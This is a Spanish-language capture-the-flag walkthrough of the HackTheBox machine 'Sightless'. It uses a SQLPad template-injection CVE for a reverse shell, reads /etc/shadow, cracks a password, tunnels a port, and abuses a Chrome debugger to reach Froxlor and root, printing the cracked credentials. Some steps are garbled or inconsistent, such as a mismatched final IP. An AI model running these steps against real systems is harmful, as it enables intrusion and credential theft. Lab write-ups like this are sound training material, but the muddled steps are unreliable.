Sightless

Escaneo:

└─$ nmap -Pn -p- --min-rate 5000 -sC -sV -oN nmap-Sightless.txt 10.10.11.32

Entramos por el puerto 80:

Buscando las funciones que tiene la pagina web

Agregamos el subdominio al hosts:

La versión instalada de SQLPad, identificada como 6.10.0, se puede encontrar a través de BurpSuite. Al analizar las vulnerabilidades de esta versión, se descubrió que está afectada por CVE-2022-0944.-> ( Enlace )<-

Y tenemos otro:

CVE-2022-0944 : Template injection in connection test endpoint leads to RCE in GitHub repositorycvedetails

Ahora ejecutaremos el siguiente codigo:

python3 exploit.py http://sqlpad.sightless.htb IP 4444

Y en escuhca:

┌──(docker㉿docker)-[~/HackBox]
└─$ nc -lvnp 4444 

La cual nos da la revershell

┌──(docker㉿docker)-[~/HackBox]
└─$ nc -lvnp 4444        
listening on [any] 4444 ...
connect to [10.10.16.47] from (UNKNOWN) [10.10.11.32] 45750
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c184118df0a6:/var/lib/sqlpad# ls

Tras un examen más detallado, descubrí que el .dockerenvarchivo efectivamente está presente, lo que confirma que la aplicación se está ejecutando dentro de un contenedor Docker. Además, después de inspeccionar los usuarios del sistema, identifiqué dos cuentas: una que pertenece a “michael” y otra a “node”. Esta información sugiere que la aplicación puede estar ejecutándose en uno de estos contextos de usuario, lo que podría proporcionar posibles puntos de entrada para una mayor explotación.

Para ver el archivo shadow, deberá iniciar sesión en el host con las dos cuentas de usuario proporcionadas. Este archivo contiene información confidencial sobre las contraseñas de los usuarios y sus propiedades asociadas. Para acceder a este archivo se requiere la autenticación y la autorización adecuadas. Una vez que haya iniciado sesión, podrá navegar hasta la ubicación del archivo shadow y revisar su contenido.

cat /etc/shadow

Parece que hay un hash para el usuario llamado Michael en el archivo Shadow. Copie el valor hash asociado con la cuenta de Michael y proceda a descifrarlo.

┌──(docker㉿docker)-[~/HackBox]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash

┌──(docker㉿docker)-[~/HackBox]
└─$ john --show hash
?:insaneclownposse

Ahora entramos por ssh:

Hay un puerto sospechoso, el 8080, que debe investigarse. Para ello, debe reenviar el tráfico del puerto 8080 a su computadora local. Esto le permitirá examinar los datos y determinar si se están produciendo actividades inusuales.

Abrimos un tunel dinamico:

┌──(docker㉿docker)-[~/HackBox]
└─$ ssh -L 8080:localhost:8080 michael@10.10.11.32

Una mirada al archivo de host interno revela un nuevo subdominio donde la aplicación podría estar ejecutándose.

cat /etc/hosts

Al modificar el archivo del host local, ahora puede acceder a la página de inicio de sesión.

Cómo aprovechar el depurador remoto de Chrome

Para acceder al panel de control de Froxlor, podemos usar el exploit del depurador remoto de Chrome ( enlace ). Hay un problema de política de ejecución en la configuración de PHP-FPM para el usuario Michael en Foxlor.

administrador:ForlorfroxAdministrador

Inicie sesión a través de root usando la clave id_rsa

id_rsa raíz@10.10.11.11

Acceda al archivo root.txt